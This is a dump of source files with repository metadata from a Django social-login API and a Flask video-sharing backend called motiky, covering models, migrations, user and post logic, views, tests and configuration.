109, "num_lines": 20, "path": "/api/migrations/0016_auto_20191027_0900.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.6 on 2019-10-27 09:00\n\nimport datetime\nfrom 
django.db import migrations, models\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('api', '0015_auto_20191027_0841'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='user',\n name='created_at',\n field=models.DateTimeField(default=datetime.datetime(2019, 10, 27, 9, 0, 5, 843604, tzinfo=utc)),\n ),\n ]\n" }, { "alpha_fraction": 0.7582417726516724, "alphanum_fraction": 0.7582417726516724, "avg_line_length": 17.200000762939453, "blob_id": "738138981c787ddf8f266d428742cd6a3dbaae81", "content_id": "5ba0ab0904d5f7e7c5ba197c4b0b1998af203751", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 91, "license_type": "no_license", "max_line_length": 33, "num_lines": 5, "path": "/scmodels/apps.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "from django.apps import AppConfig\n\n\nclass ScmodelsConfig(AppConfig):\n name = 'scmodels'\n" }, { "alpha_fraction": 0.7341772317886353, "alphanum_fraction": 0.7341772317886353, "avg_line_length": 16.55555534362793, "blob_id": "d66bc6bf3194e6f4e11c226451a1aab3ab16e23b", "content_id": "fa827a3035aa6a8560293872cd8bd95c0f491727", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 158, "license_type": "no_license", "max_line_length": 28, "num_lines": 9, "path": "/README.md", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "# App Features\n- Register user via email\n- Register user via Facebook\n- Login user\n- Update user info\n- Reset pass.\n\n# Backend Tool Features\n- List all user.\n" }, { "alpha_fraction": 0.4610169529914856, "alphanum_fraction": 0.46305084228515625, "avg_line_length": 27.384614944458008, "blob_id": "e26e2849b753933b3672bb08c45d026e19f510b0", "content_id": "d42e6315ce5a64b4aace45b994849d5897552428", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1475, "license_type": "no_license", "max_line_length": 103, "num_lines": 52, "path": "/my_utils/log_module.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "import logging\nimport os\nfrom logging import config\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\ndef config_log(log_name, log_level):\n log_name = log_name\n LOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'standard': {\n 'format': \"[%(asctime)s] %(levelname)s [%(name)s.%(funcName)s:%(lineno)d] %(message)s\",\n 'datefmt': \"%d/%b/%Y %H:%M:%S\"\n },\n },\n 'handlers': {\n 'console': {\n 'level': log_level,\n 'formatter': 'standard',\n 'class': 'logging.StreamHandler',\n },\n 'file': {\n 'level': log_level,\n 'formatter': 'standard',\n 'backupCount': 7,\n 'interval': 1,\n 'when': 'midnight',\n 'class': 'logging.handlers.TimedRotatingFileHandler',\n 'filename': BASE_DIR + \"/logs/\" + log_name + \".log\"\n },\n },\n 'loggers': {\n log_name: {\n # 'handlers': ['console', 'file'],\n 'handlers': ['console'],\n 'level': log_level,\n },\n }\n }\n\n logging.config.dictConfig(LOGGING)\n\nif(str(os.getenv('ENV_SCRIPT')) == 'prod'):\n log_level = 'INFO'\nelse:\n log_level = 'DEBUG'\n\n\nconfig_log('socialapi', log_level)\nlogger_socialapi = logging.getLogger('socialapi')" }, { "alpha_fraction": 0.7123287916183472, "alphanum_fraction": 0.7123287916183472, "avg_line_length": 39.66666793823242, "blob_id": "e8c3c455430f5bc5a17f4a7f3e30e550b7b5699e", "content_id": 
"2c50a0b08d6ceefa8039d7e8f497fefe92dc9bb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 365, "license_type": "no_license", "max_line_length": 75, "num_lines": 9, "path": "/my_utils/check_fields.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "from my_utils import cus_exception\n\ndef check_required_fields(required_fields, request_data):\n for item in required_fields:\n if item not in request_data:\n raise cus_exception.ValidationFailed(f'Lack of {item} field')\n\n if(len(required_fields) != len(request_data)):\n raise cus_exception.ValidationFailed(f'You have unexpected fields')" }, { "alpha_fraction": 0.5131579041481018, "alphanum_fraction": 0.5756579041481018, "avg_line_length": 29.399999618530273, "blob_id": "6d6c1fd574bd132062a00b780b8615cfe2912087", "content_id": "435aad166cbb6b2bd621dbd45bf122cee86d500c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 912, "license_type": "no_license", "max_line_length": 122, "num_lines": 30, "path": "/api/migrations/0004_auto_20191024_0156.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.6 on 2019-10-24 01:56\n\nimport datetime\nfrom django.db import migrations, models\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('api', '0003_auto_20191018_0952'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='user',\n name='created_at',\n field=models.DateTimeField(default=datetime.datetime(2019, 10, 24, 1, 56, 35, 276112, tzinfo=utc)),\n ),\n migrations.AlterField(\n model_name='user',\n name='fb_id',\n field=models.CharField(db_index=True, max_length=255, null=True, unique=True),\n ),\n migrations.AlterField(\n model_name='user',\n name='gender',\n field=models.BooleanField(choices=[('1', 'MALE'), ('2', 'FEMALE'), ('3', 'OTHERS')], max_length=1, null=True),\n ),\n ]\n" }, { "alpha_fraction": 0.6446078419685364, "alphanum_fraction": 0.6519607901573181, "avg_line_length": 26.233333587646484, "blob_id": "196af15d7a79cc2845de73b91af7f6cacc79b662", "content_id": "93e6f8fc08b9bb41783c7de2e1d0eaee1fbc9232", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 816, "license_type": "no_license", "max_line_length": 61, "num_lines": 30, "path": "/my_utils/cus_exception.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "from rest_framework.exceptions import APIException\nfrom rest_framework import status\nfrom my_utils import response_status\n\n\n\nclass ValidationFailed(APIException):\n status_code = status.HTTP_400_BAD_REQUEST\n default_detail = ('Invalid input.')\n default_code = 'invalid'\n\n def __init__(self, message=None, detail=None, code=None):\n\n self.detail = {\n 'ReponseCode': response_status.FAIL.code,\n 'ReponseMessage': message\n }\n\n\nclass TokenInvalid(APIException):\n status_code = status.HTTP_400_BAD_REQUEST\n default_detail = ('Invalid input.')\n default_code = 'invalid'\n\n def __init__(self, message=None, detail=None, code=None):\n\n self.detail = {\n 'ReponseCode': response_status.FAIL.code,\n 'ReponseMessage': \"Token invalid\"\n }" }, { "alpha_fraction": 0.5317185521125793, "alphanum_fraction": 0.5928488969802856, "avg_line_length": 27.899999618530273, "blob_id": "f8bf3cb33b2b7733b2f1ed515ba3f69af818277d", "content_id": "26d7e6f772d2ac00e99e0e21dcb9201859fb2f9c", "detected_licenses": [], 
"is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 867, "license_type": "no_license", "max_line_length": 111, "num_lines": 30, "path": "/api/migrations/0007_auto_20191025_0224.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.6 on 2019-10-25 02:24\n\nimport datetime\nfrom django.db import migrations, models\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('api', '0006_auto_20191024_0201'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='user',\n name='account_type',\n field=models.IntegerField(editable=False),\n ),\n migrations.AlterField(\n model_name='user',\n name='created_at',\n field=models.DateTimeField(default=datetime.datetime(2019, 10, 25, 2, 24, 26, 588645, tzinfo=utc)),\n ),\n migrations.AlterField(\n model_name='user',\n name='email',\n field=models.EmailField(db_index=True, editable=False, max_length=254, null=True, unique=True),\n ),\n ]\n" }, { "alpha_fraction": 0.5823096036911011, "alphanum_fraction": 0.6437346339225769, "avg_line_length": 29.148147583007812, "blob_id": "c99549a37c95b111e8c5f4892206f27456028122", "content_id": "c8111247c5c21b9a82e3c19f8ece7a0d4805d8f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 814, "license_type": "no_license", "max_line_length": 148, "num_lines": 27, "path": "/api/migrations/0018_auto_20191027_0936.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.6 on 2019-10-27 09:36\n\nimport datetime\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('api', '0017_auto_20191027_0918'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='user',\n name='created_at',\n field=models.DateTimeField(default=datetime.datetime(2019, 10, 27, 9, 36, 21, 114555, tzinfo=utc)),\n ),\n migrations.AlterField(\n model_name='userotp',\n name='uid',\n field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to=settings.AUTH_USER_MODEL),\n ),\n ]\n" } ]
28
imgarth/motiky
https://github.com/imgarth/motiky
14847f88e29fcb89ff1030d60495af63a25c9cc2
59bf2a27454e65c3547f786e7770812e9ff803ab
d93d6d1e590d0baafa3c95b336f3aa5aa0ff3cc2
refs/heads/master
2021-01-20T22:55:10.690413
2013-06-26T14:51:59
2013-06-26T14:51:59
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7269043922424316, "alphanum_fraction": 0.7269043922424316, "avg_line_length": 29.09756088256836, "blob_id": "af107e8e6c0a0cf42fd3156070499fb8cdfbb94b", "content_id": "f1827a09f2d7d7029f35e7095ac3e7aab90b43fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1234, "license_type": "no_license", "max_line_length": 72, "num_lines": 41, "path": "/manage.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "import os\nimport sys\nfrom flask import current_app\nfrom flask.ext.script import Manager,prompt,prompt_pass,\\\n prompt_bool,prompt_choices\nfrom flask.ext.script import Server\nfrom werkzeug import generate_password_hash,check_password_hash\n\nfrom motiky import configs\nfrom motiky.configs import db\nfrom motiky import create_app\n\nfrom motiky.logic.models import CmsUser\n\napp = create_app(configs.ProductionConfig)\nmanager = Manager(app)\n\[email protected]\ndef create_all():\n if prompt_bool(\"Are you sure? You will init your database\"):\n db.create_all()\n\[email protected]\ndef drop_all():\n if prompt_bool(\"Are you sure? You will lose all your data!\"):\n db.drop_all()\n\[email protected]('-u','--username',dest='username',required=True)\[email protected]('-p','--password',dest='password',required=True)\[email protected]('-e','--email',dest='email',required=True)\ndef createuser(username=None,password=None,email=None):\n password = generate_password_hash(password)\n cmsuser = CmsUser(username=username,password=password,email=email)\n db.session.add(cmsuser)\n db.session.commit()\n print 'cms user was created'\n\nmanager.add_command('runserver',Server())\n\nif __name__ == '__main__':\n manager.run()\n" }, { "alpha_fraction": 0.6164383292198181, "alphanum_fraction": 0.6301369667053223, "avg_line_length": 13.199999809265137, "blob_id": "66af4cec3e8040ef2cd67892faf6dd6cb705d2cc", "content_id": "681b615d2377c00f71e57fe4713360ce6e666ffd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 73, "license_type": "no_license", "max_line_length": 33, "num_lines": 5, "path": "/deploy.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport sys\n\nfrom fabric.api import env,run,cd\n\n\n" }, { "alpha_fraction": 0.6363480091094971, "alphanum_fraction": 0.6397867798805237, "avg_line_length": 30.410810470581055, "blob_id": "c834788ffe50a2e9b63458e485ac502a078aaf1e", "content_id": "89d4a0ebdcbc56da888eadbdd728f31b3f591f1f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5856, "license_type": "no_license", "max_line_length": 109, "num_lines": 185, "path": "/motiky/logic/logic_user.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# author: notedit\n# date: 2013-01-30\n\nimport types\nimport traceback\n\n\nfrom motiky.coreutil import BackendError,register,assert_error\n\nfrom motiky.logic.models import User,Post,UserFollowAsso\n\nfrom motiky.configs import db\n\n@register('get_user')\ndef get_user(user_id):\n multi = False\n if type(user_id) == types.ListType:\n assert_error(all([type(u) == types.IntType for u in user_id]),'ParamError')\n multi = True\n else:\n assert_error(type(user_id) == types.IntType,'ParamError')\n user_id = user_id,\n\n users = User.query.filter(User.id.in_(user_id)).all()\n if not users:\n raise BackendError('EmptyError','用户不存在')\n\n if multi:\n return [u.json for u in users]\n 
else:\n return users[0].json\n\n@register('get_user_by_username')\ndef get_user_by_username(username):\n user = User.query.filter(User.username == username).first()\n return user.json if user else {}\n\n@register('get_user_by_email')\ndef get_user_by_email(email):\n user = User.query.filter(User.email == email).first()\n return user.json if user else {}\n\n@register('is_username_exist')\ndef is_username_exist(username):\n assert_error(type(username) == types.StringType,'ParamError')\n return True if _check_username(username) else False\n\n@register('is_email_exist')\ndef is_email_exist(email):\n assert_error(type(email) == types.StringType,'ParamError')\n return True if _check_email(email) else False\n\ndef _check_username(username):\n u = User.query.filter(db.func.lower(User.username) == username).first()\n return u\n\ndef _check_email(email):\n u = User.query.filter(User.email == email).first()\n return u\n\n\n@register('add_user')\ndef add_user(username,photo_url,uid,signature='',access_token=''):\n assert_error(type(username)==types.StringType,'ParamError','用户昵称应该为字符串')\n assert_error(photo_url == None or type(photo_url) == types.StringType,'ParamError')\n assert_error(type(uid) == types.StringType,'ParamError')\n\n qd = {\n 'username':username,\n 'photo_url':photo_url or '',\n 'uid':uid,\n 'signature':signature,\n 'access_token':access_token\n }\n\n try:\n user = User(**qd)\n db.session.add(user)\n db.session.commit()\n except:\n db.session.rollback()\n raise BackendError('InternalError',traceback.format_exc())\n\n return user.json\n\n@register('set_user')\ndef set_user(user_id,info_d):\n assert_error(type(user_id) == types.IntType,'ParamError')\n user = User.query.get(user_id)\n try:\n for k,v in info_d.items():\n if v is not None:\n setattr(user,k,v)\n db.session.commit()\n except:\n db.session.rollback()\n raise\n else:\n return user.json\n\n@register('get_user_by_uid')\ndef get_user_by_uid(uid):\n assert_error(type(uid) in (types.StringType,types.ListType),'ParamError')\n multi = False\n if type(uid) == types.ListType:\n multi = True\n else:\n uid = uid,\n\n users = User.query.filter(User.uid.in_(uid)).all()\n if len(users) == 0:\n raise BackendError('EmptyError','用户不存在')\n\n if multi:\n return [u.json for u in users]\n else:\n return users[0].json\n\n\n@register('follow_user')\ndef follow_user(fid,tid):\n assert_error(all([type(_id) == types.IntType for _id in [fid,tid]]),'ParamError')\n try:\n asso = UserFollowAsso(user_id=fid,user_id_to=tid)\n db.session.add(asso)\n db.session.commit()\n except:\n db.session.rollback()\n raise\n else:\n return asso.id\n\n@register('unfollow_user')\ndef unfollow_user(fid,tid):\n assert_error(all([type(_id) == types.IntType for _id in [fid,tid]]),'ParamError')\n asso = UserFollowAsso.query.filter(db.and_(UserFollowAsso.user_id==fid,UserFollowAsso.user_id_to==tid)).\\\n first()\n if asso is None:\n return\n try:\n db.session.delete(asso)\n db.session.commit()\n except:\n db.session.rollback()\n raise\n else:\n return True\n\n@register('is_following_user')\ndef is_following_user(uid,uid_to):\n if type(uid_to) == types.IntType:\n _count = db.session.query(UserFollowAsso.id).\\\n filter(db.and_(UserFollowAsso.user_id == uid,UserFollowAsso.user_id_to == uid_to)).count()\n return True if _count > 0 else False\n elif type(uid_to) == types.ListType:\n follow_uids = db.session.query(UserFollowAsso.user_id_to).\\\n filter(db.and_(UserFollowAsso.user_id == uid,UserFollowAsso.user_id_to.in_(uid_to))).all()\n follow_uids = [u[0] for u in follow_uids]\n 
ret_list = [(ret,ret in follow_uids) for ret in uid_to]\n return dict(ret_list)\n\n@register('get_user_following')\ndef get_user_following(user_id,limit=50,offset=0):\n assert_error(type(user_id) == types.IntType,'ParamError')\n follows = User.query.join(UserFollowAsso,User.id == UserFollowAsso.user_id_to).\\\n filter(UserFollowAsso.user_id == user_id).limit(limit).offset(offset).all()\n return [u.json for u in follows]\n\n@register('get_user_following_count')\ndef get_user_following_count(user_id):\n _count = UserFollowAsso.query.filter(UserFollowAsso.user_id == user_id).count()\n return _count\n\n@register('get_user_follower')\ndef get_user_follower(user_id,limit=50,offset=0):\n assert_error(type(user_id) == types.IntType,'ParamError')\n follows = User.query.join(UserFollowAsso,User.id == UserFollowAsso.user_id).\\\n filter(UserFollowAsso.user_id_to == user_id).limit(limit).offset(offset).all()\n return [u.json for u in follows]\n\n@register('get_user_follower_count')\ndef get_user_follower_count(user_id):\n _count = UserFollowAsso.query.filter(UserFollowAsso.user_id_to == user_id).count()\n return _count\n\n\n\n\n\n" }, { "alpha_fraction": 0.5649828314781189, "alphanum_fraction": 0.5919568538665771, "avg_line_length": 29.417909622192383, "blob_id": "300d419e0fabe507946dfad635ddb266b67b2833", "content_id": "3c9b61b175177e87aa57cbd23ca971e4b12888b1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2039, "license_type": "no_license", "max_line_length": 81, "num_lines": 67, "path": "/tests/test_comment.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n\nimport os\nimport sys\nimport types\nimport json\nimport time\nfrom datetime import datetime\nfrom datetime import timedelta\n\nfrom StringIO import StringIO\n\nfrom tests import TestCase\n\n\nfrom motiky.logic.models import User,Post,UserLikeAsso,Report,Install,\\\n UserFollowAsso,Comment,Activity,Action\n\nfrom motiky.logic import backend\n\nfrom motiky.configs import db,redis\n\nclass TestComment(TestCase):\n\n\n def test_comment_view(self):\n\n # post\n user1 = backend.add_user('username01','photo_url01','weibo_id01')\n headers = self.generate_header('weibo_id01')\n post1 = backend.add_post('post01',user1['id'],\n 'video_url','pic_small1')\n\n data = {\n 'author_id':user1['id'],\n 'content':'comment01',\n 'post_id':post1['id']\n }\n\n resp = self.client.post('/comment',data=json.dumps(data),headers=headers,\n content_type='application/json')\n\n _data = json.loads(resp.data)\n assert resp.status_code == 200\n assert _data['content'] == 'comment01'\n \n # delete\n resp = self.client.delete('/comment/%d'%_data['id'],\n headers=headers,content_type='application/json')\n print resp.data\n assert resp.status_code == 204\n\n def test_post_comment_view(self):\n\n user1 = backend.add_user('username01','photo_url01','weibo_id01')\n post1 = backend.add_post('post01',user1['id'],\n 'video_url','pic_small1')\n comment1 = backend.add_comment(post1['id'],'comment1',user1['id'])\n comment2 = backend.add_comment(post1['id'],'comment2',user1['id'])\n comment3 = backend.add_comment(post1['id'],'comment3',user1['id'])\n\n headers = self.generate_header('weibo_id01')\n\n resp = self.client.get('/post/%d/comment' % post1['id'],headers=headers)\n data_get = json.loads(resp.data)\n assert len(data_get['comments']) == 3\n\n" }, { "alpha_fraction": 0.627364456653595, "alphanum_fraction": 0.6368222236633301, "avg_line_length": 24.901639938354492, "blob_id": 
"6a66a454c757ca9390ea870ec606d73d852a7d73", "content_id": "658d593958e224a04953b7eba3bb6ee2928fc8f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1586, "license_type": "no_license", "max_line_length": 75, "num_lines": 61, "path": "/motiky/views/tag.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# author: notedit <[email protected]>\n# date: 2013-04-16\n\nimport sys \nimport time\nimport logging\nimport flask\nfrom flask import g\nfrom flask import request\nfrom flask import Blueprint\nfrom flask import redirect\nfrom flask import Response\nfrom flask import current_app\nfrom flask import session\nfrom flask import jsonify\nfrom flask import flash\nfrom flask.views import MethodView\nfrom flask.views import View\n\nfrom motiky import authutil\nfrom motiky.logic import backend\nfrom motiky.coreutil import BackendError\nfrom motiky.configs import rq\n\ninstance = Blueprint('tag',__name__)\n\nclass TagView(MethodView):\n\n def get(self,tag_id):\n try:\n page = int(request.values.get('page'))\n except:\n page = 1\n\n limit = 10\n offset = (page - 1) * 50\n\n tag = backend.get_tag(tag_id)\n posts = backend.get_tag_post(tag_id,limit=limit,offset=offset)\n count = backend.get_tag_post_count(tag_id)\n\n for post in posts:\n try:\n user = backend.get_user(post['author_id'])\n post['user'] = user\n except BackendError,ex:\n continue\n\n return jsonify(tag=tag,posts=posts,count=count,page=page)\n\nclass TagsView(MethodView):\n\n def get(self):\n tags = backend.get_recommend_tags()\n return jsonify(results=tags)\n\ninstance.add_url_rule('/tag/<int:tag_id>',view_func=TagView.as_view('tag'),\n methods=['GET',])\ninstance.add_url_rule('/tags',view_func=TagsView.as_view('tags'),\n methods=['GET',])\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.5953288674354553, "alphanum_fraction": 0.5994598269462585, "avg_line_length": 27.475112915039062, "blob_id": "21ac3ae4e1e4cffb0285b0dd7ea2c9c3cc154df3", "content_id": "758c33ff29a5a843b1077ee51c266ea47e39b9e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6310, "license_type": "no_license", "max_line_length": 92, "num_lines": 221, "path": "/motiky/logic/logic_post.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# author: notedit\n# date: 2013-01-30\n\nimport types\nimport traceback\n\nfrom motiky.coreutil import BackendError,register,assert_error\n\nfrom motiky.logic.models import User,Post,UserLikeAsso,UserPlayAsso\n\nfrom motiky.configs import db\n\n\n@register('get_post')\ndef get_post(post_id):\n post = Post.query.get(post_id)\n return post.json\n\n@register('add_post')\ndef add_post(title,author_id,video_url,pic_small='',pic_big='',show=True,recommended=False):\n assert_error(type(title) == types.StringType,'ParamError')\n assert_error(type(author_id) == types.IntType,'ParamError')\n assert_error(type(video_url) == types.StringType,'ParamError')\n\n qd = {\n 'title':title,\n 'author_id':author_id,\n 'video_url':video_url,\n 'pic_small':pic_small,\n 'pic_big':pic_big,\n 'show':show,\n 'recommended':recommended,\n }\n try:\n p = Post(**qd)\n db.session.add(p)\n db.session.commit()\n except:\n db.session.rollback()\n raise BackendError('InternalError',traceback.format_exc())\n return p.json\n\n\n\n@register('set_post')\ndef set_post(post_id,pdict):\n fd_list = ('title','pic_small','pic_big','author_id','show',\n 
'recommended','date_create','date_update','date_publish')\n cset = set(pdict.keys())\n if not cset.issubset(fd_list):\n raise BackendError('ParamError','更新的字段不允许')\n post = Post.query.get(post_id)\n for k,v in pdict.items():\n if v is not None:\n setattr(post,k,v)\n try:\n db.session.commit()\n except:\n db.session.rollback()\n raise \n\n return post.json\n\n\n@register('get_latest_post')\ndef get_latest_post(offset=0,limit=50):\n posts = Post.query.filter(Post.show == True).order_by(Post.date_create.desc()).\\\n limit(limit).offset(offset).all()\n\n _posts = []\n for p in posts:\n _u = p.user.json\n _p = p.json\n _p.update({'user':_u})\n _posts.append(_p)\n\n return _posts\n\n\n@register('get_post_count')\ndef get_post_count():\n count = Post.query.filter(Post.show == True).count()\n return count\n\n@register('get_hot_post')\ndef get_hot_post(offset=0,limit=50):\n posts = Post.query.filter(Post.show == True).order_by(Post.visite_count.desc()).\\\n limit(limit).offset(offset).all()\n\n _posts = []\n for p in posts:\n _u = p.user.json\n _p = p.json\n _p.update({'user':_u})\n _posts.append(_p)\n\n return _posts\n\n@register('get_user_post')\ndef get_user_post(user_id,offset=0,limit=20):\n assert_error(offset >= 0,'ParamError')\n posts = Post.query.filter(Post.author_id == user_id).\\\n order_by(Post.date_create.desc()).\\\n limit(limit).offset(offset).all()\n\n _posts = []\n for p in posts:\n _u = p.user.json\n _p = p.json\n _p.update({'user':_u})\n _posts.append(_p)\n\n return _posts\n\n@register('get_user_post_count')\ndef get_user_post_count(user_id):\n count = Post.query.filter(Post.author_id == user_id).count()\n return count\n\n\n@register('get_user_liked_post')\ndef get_user_liked_post(user_id,offset=0,limit=20):\n assert_error(offset >= 0,'ParamError')\n posts = Post.query.join(UserLikeAsso,Post.id == UserLikeAsso.post_id).\\\n filter(UserLikeAsso.user_id == user_id).\\\n order_by(UserLikeAsso.date_create.desc()).\\\n limit(limit).offset(offset).all()\n\n _posts = []\n for p in posts:\n _u = p.user.json\n _p = p.json\n _p.update({'user':_u})\n _posts.append(_p)\n\n return _posts\n\n@register('get_user_liked_post_count')\ndef get_user_liked_post_count(user_id):\n count = Post.query.join(UserLikeAsso,Post.id == UserLikeAsso.post_id).\\\n filter(UserLikeAsso.user_id == user_id).count()\n return count\n\n@register('get_post_liked_count')\ndef get_post_liked_count(post_id):\n count = UserLikeAsso.query.filter(UserLikeAsso.post_id == post_id).count()\n return count\n\n@register('add_like')\ndef add_like(user_id,post_id):\n ula = UserLikeAsso()\n ula.user_id = user_id\n ula.post_id = post_id\n try:\n db.session.add(ula)\n db.session.commit()\n except:\n db.session.rollback()\n raise BackendError('InternalError',traceback.format_exc())\n else:\n return ula.id\n\n@register('del_like')\ndef del_like(user_id,post_id):\n assert_error(all([type(x) == types.IntType for x in [user_id,post_id]]),\n 'ParamError')\n ula = UserLikeAsso.query.filter(UserLikeAsso.user_id == user_id).\\\n filter(UserLikeAsso.post_id == post_id).first()\n if ula is None:\n return\n try:\n db.session.delete(ula)\n db.session.commit()\n except:\n db.session.rollback()\n raise BackendError('InternalError',traceback.format_exc())\n else:\n return True\n\n\n@register('add_play')\ndef add_play(user_id,post_id):\n assert_error(all([type(x) for x in [user_id,post_id]]),'ParamError')\n ura = UserPlayAsso()\n ura.user_id = user_id\n ura.post_id = post_id\n\n try:\n db.session.add(ura)\n db.session.commit()\n except:\n 
db.session.rollback()\n raise BackendError('InternalError',traceback.format_exc())\n\n@register('add_play_count')\ndef add_play_count(post_id,count=1):\n post = Post.query.get(post_id)\n post.play_count += count\n try:\n db.session.commit()\n except:\n db.session.rollback()\n raise BackendError('InternalError',traceback.format_exc())\n else:\n return post.json\n\n@register('is_like_post')\ndef is_like_post(uid,post_id):\n if type(post_id) == types.IntType:\n _count = db.session.query(UserLikeAsso.id).\\\n filter(db.and_(UserLikeAsso.user_id == uid,\n UserLikeAsso.post_id == post_id)).count()\n return True if _count > 0 else False\n elif type(post_id) == types.ListType:\n liked_post_ids = db.session.query(UserLikeAsso.post_id).\\\n filter(db.and_(UserLikeAsso.user_id == uid,\n UserLikeAsso.post_id.in_(post_id))).all()\n liked_post_ids = [p[0] for p in liked_post_ids]\n ret_list = [(ret,ret in liked_post_ids) for ret in post_id]\n return dict(ret_list)\n\n" }, { "alpha_fraction": 0.6081504821777344, "alphanum_fraction": 0.6394984126091003, "avg_line_length": 18.8125, "blob_id": "0db275e96da3ac8c54639ff4dbeed880093ff5c0", "content_id": "f976ff54840815adf8b95b417163236878d9e532", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 319, "license_type": "no_license", "max_line_length": 86, "num_lines": 16, "path": "/worker.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport sys\nimport rq\nfrom rq import Queue,Connection,Worker\n\n\n# why this? it can use the sqlalchemy's connection poll from rq Performance notes \n# add by notedit 2013-01-24\n\nwith Connection():\n\n qs = map(rq.Queue, sys.argv[1:]) or [rq.Queue()]\n \n w = rq.Worker(qs)\n w.work()\n\n\n" }, { "alpha_fraction": 0.7176923155784607, "alphanum_fraction": 0.7238461375236511, "avg_line_length": 27.866666793823242, "blob_id": "9d86467a4dbb8d214aacba1fc541bfd58ee2d92c", "content_id": "badb46345ec26df994d81477fb0f0f3078fc84f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1300, "license_type": "no_license", "max_line_length": 84, "num_lines": 45, "path": "/motiky/configs.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport socket\nimport datetime\n\nfrom redis import Redis\nfrom rq import Connection,Queue\nfrom flask.ext.redis import Redis as fRedis\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom flask.ext.cache import Cache\nfrom flask.ext.mail import Mail\n\ndb = SQLAlchemy()\ncache = Cache()\nmail = Mail()\nredis = fRedis()\nrq = Queue('motiky',connection=Redis())\n\nclass DefaultConfig(object):\n\n DEBUG = False\n SECRET_KEY = 'lifeistooshorttowait'\n APPLICATION_SECRET = 'lifeistooshorttowait'\n SQLALCHEMY_DATABASE_URI = 'postgresql+psycopg2://user:password@localhost/motiky'\n SQLALCHEMY_ECHO = False\n\nclass TestConfig(object):\n CONFIG_TYPE = 'test'\n SQLALCHEMY_DATABASE_URI = 'postgresql+psycopg2://user:password@localhost/test'\n SQLALCHEMY_ECHO = False\n APPLICATION_SECRET = 'lifeistooshorttowait'\n CSRF_ENABLED = False\n VIDEO_URL_PREFIX = 'http://localhost'\n\nclass DevConfig(object):\n CONFIG_TYPE = 'dev'\n SQLALCHEMY_DATABASE_URI = \\\n 'postgresql+psycopg2://user:password@localhost/motiky'\n\nclass ProductionConfig(object):\n CONFIG_TYPE = 'production'\n SQLALCHEMY_ECHO = False\n VIDEO_URL_PREFIX = 'http://motiky01.b0.upaiyun.com'\n SQLALCHEMY_DATABASE_URI = 
